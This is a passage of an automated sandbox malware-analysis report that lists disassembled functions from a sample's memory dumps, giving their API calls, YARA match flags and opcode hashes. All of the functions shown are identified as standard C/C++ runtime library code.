                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 009FB186
                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 009FB1B8
                                                                                    • List.LIBCMT ref: 009FB23B
                                                                                    • List.LIBCMT ref: 009FB24A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                    • String ID: 6+A
                                                                                    • API String ID: 3281396844-2819411039
                                                                                    • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                                                    • Instruction ID: 4915a540afb596de9e3a71257ac2914d6df3970430079822a3437e47c5b65073
                                                                                    • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                                                    • Instruction Fuzzy Hash: AA319832E0965EDFCB14EFA4C9A16FDBBB1BF84318F14006ADA1167652DB316D14CB90
                                                                                    Function 0043F961 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                    • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                    • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                                                    Function 00A1FBC8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                    • Instruction ID: 6be9790f7edd24cecd074d533ab0d8b62e935f3bdfa40566d5bfa5cb988f23e3
                                                                                    • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                    • Instruction Fuzzy Hash: E411D336505259BFDB206F76DD45DAB7AACEF96760B200B34FC19C7290DA308981E6F0
                                                                                    Function 0043A3A3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                                                    • _free.LIBCMT ref: 0043A3F1
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 0043A3FC
                                                                                    • _free.LIBCMT ref: 0043A407
                                                                                    • _free.LIBCMT ref: 0043A45B
                                                                                    • _free.LIBCMT ref: 0043A466
                                                                                    • _free.LIBCMT ref: 0043A471
                                                                                    • _free.LIBCMT ref: 0043A47C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                    • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                    • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                                                    Function 00A1A60A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A1A351: _free.LIBCMT ref: 00A1A37A
                                                                                    • _free.LIBCMT ref: 00A1A658
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1A663
                                                                                    • _free.LIBCMT ref: 00A1A66E
                                                                                    • _free.LIBCMT ref: 00A1A6C2
                                                                                    • _free.LIBCMT ref: 00A1A6CD
                                                                                    • _free.LIBCMT ref: 00A1A6D8
                                                                                    • _free.LIBCMT ref: 00A1A6E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                    • Instruction ID: c36e74e4fe3745368fe52f7e8c18111605f507624d3c46138982cf40214acc97
                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                    • Instruction Fuzzy Hash: 0F117C32581B04FADA20BBB1CE5BFCB779CEF01740F440C14F2B9AE152DA64F6948651
                                                                                    Function 00412412 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
                                                                                    • GetLastError.KERNEL32 ref: 00412426
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
                                                                                    • GetLastError.KERNEL32 ref: 0041245D
                                                                                    • GetLastError.KERNEL32 ref: 0041246F
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                    • String ID:
                                                                                    • API String ID: 4227777306-0
                                                                                    • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                    • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                                                    • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                                                    • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                                                    Function 009F2679 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 009F2687
                                                                                    • GetLastError.KERNEL32 ref: 009F268D
                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 009F26BA
                                                                                    • GetLastError.KERNEL32 ref: 009F26C4
                                                                                    • GetLastError.KERNEL32 ref: 009F26D6
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F26EC
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F26FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                    • String ID:
                                                                                    • API String ID: 4227777306-0
                                                                                    • Opcode ID: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                    • Instruction ID: 49c2243840d80e77b498e7dbf168a0a77f3a8a5417637152f3b420632920b210
                                                                                    • Opcode Fuzzy Hash: 23aee74c988fd39cb7eacc8cccc5b930dc7cceb5caf4327195496d093c37fa26
                                                                                    • Instruction Fuzzy Hash: 0E01A73550111DA7D710AF65EC49BBF376CAF42B52B600427F605E6051EB24D90497AC
                                                                                    Function 009F24C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,009F672B), ref: 009F24D6
                                                                                    • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009F24E4
                                                                                    • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009F24F2
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,009F672B), ref: 009F2520
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009F2527
                                                                                    • GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F2542
                                                                                    • GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F254E
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2564
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2572
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                    • String ID: kernel32.dll
                                                                                    • API String ID: 4179531150-1793498882
                                                                                    • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                    • Instruction ID: 9043ca2885dded376fd4429152b12a07815d01810199d7276b99184d93dfca7b
                                                                                    • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                    • Instruction Fuzzy Hash: E8F0A9759043143FE7113B797C59A3A7FACDD46B233200636F911D21A2EB75C900876D
                                                                                    Function 0042FF04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: 11@$CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-3445089953
                                                                                    • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                    • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                                                    • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                                                    • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                                                    Function 00A123BB Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00A1260C,00000001,00000001,?), ref: 00A12415
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A1260C,00000001,00000001,?,?,?,?), ref: 00A1249B
                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A12595
                                                                                    • __freea.LIBCMT ref: 00A125A2
                                                                                      • Part of subcall function 00A1392E: RtlAllocateHeap.NTDLL(00000000,009EDAFC,00000000), ref: 00A13960
                                                                                    • __freea.LIBCMT ref: 00A125AB
                                                                                    • __freea.LIBCMT ref: 00A125D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1414292761-0
                                                                                    • Opcode ID: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                    • Instruction ID: 0b6e747fe43443318f8fc32fba2125968dc7092c1459e5685eeceb5ff9cf54e5
                                                                                    • Opcode Fuzzy Hash: 51f373b7acc2851bdc3dd9d03c9e40d3ec423ff86316042841f40984be93ade7
                                                                                    • Instruction Fuzzy Hash: 7551B072610216AFDB258F64CC92FFE77AAEB84760F194629FD14DA140EB38DCA0C750
                                                                                    Function 00A0E439 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __cftoe
                                                                                    • String ID:
                                                                                    • API String ID: 4189289331-0
                                                                                    • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                    • Instruction ID: 3d3e9535b53a7feae2b51e96b817dec20e7c32c63aec727133a295bd3ec1df26
                                                                                    • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                    • Instruction Fuzzy Hash: 84512C3290020DABDF24DF68ED46FAE77A9EF49370F104A19F815D61C2EB32DD40A664
                                                                                    Function 009E545C Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                    • String ID:
                                                                                    • API String ID: 1687354797-0
                                                                                    • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction ID: 12e7acfbc6055a647face632679f00900d78048f3cef6280c452191beda5c091
                                                                                    • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                    • Instruction Fuzzy Hash: FA219471C05288AADF02ABA5D841BDEB7F8AF49325F14401AF000B7291DB748E44C775
                                                                                    Function 00428DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B077ECD6), ref: 00428E08
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                                                    • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,B077ECD6), ref: 00428E81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                                                    • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                                                    Function 00A09061 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00A09058,00A069E9,00A20927,00000008,00A20C8C,?,?,?,?,00A03CD2,?,?,0045A064), ref: 00A0906F
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A0907D
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A09096
                                                                                    • SetLastError.KERNEL32(00000000,?,00A09058,00A069E9,00A20927,00000008,00A20C8C,?,?,?,?,00A03CD2,?,?,0045A064), ref: 00A090E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction ID: 48cb3876de59ecb804c40884b400aeb9d064766ef6c60ee0483321d67b823370
                                                                                    • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                                                    • Instruction Fuzzy Hash: 1C01263221AB1E6EE7342FB47C899AB2754EB19776B300339F124411F3EF138C106999
                                                                                    Function 00404D77 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                                                    • int.LIBCPMT ref: 00404D9F
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                                                    • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                                                    Function 009E4FDE Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009E4FEF
                                                                                    • int.LIBCPMT ref: 009E5006
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009E500F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009E5040
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009E5056
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009E5074
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction ID: 22ad41a6793f818ad5ce0359ccde2018b622f781a88102d63341ad8e5c8aac6d
                                                                                    • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                                                    • Instruction Fuzzy Hash: 9B11EC718006689BCB23EBA1C802BED7364AF80315F294418F515672D2DB749E05CBD0
                                                                                    Function 0040C1AE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                                                    • int.LIBCPMT ref: 0040C1D6
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                                                    • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                                                    Function 004054F7 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                                                    • int.LIBCPMT ref: 0040551F
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00405559
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                    • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                                                    • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                    • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                                                    Function 00405593 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                                                    • int.LIBCPMT ref: 004055BB
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                                                    • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
